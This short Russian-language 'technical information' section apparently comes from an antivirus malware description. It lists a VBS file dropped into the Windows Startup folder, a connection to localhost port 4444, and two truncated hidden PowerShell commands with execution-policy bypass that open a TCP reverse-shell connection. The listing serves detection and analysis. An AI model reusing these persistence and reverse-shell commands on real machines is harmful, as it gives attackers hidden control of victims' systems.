Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\<Имя файла>.vbs
- 'localhost':4444
- '<SYSTEM32>\cmd.exe' /c powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('127.0.0.1', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.Stream...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('127.0.0.1', 4444); $NetworkStream = $TCPClient.GetStream(); $StreamWriter = New-Object IO.StreamWriter($Networ...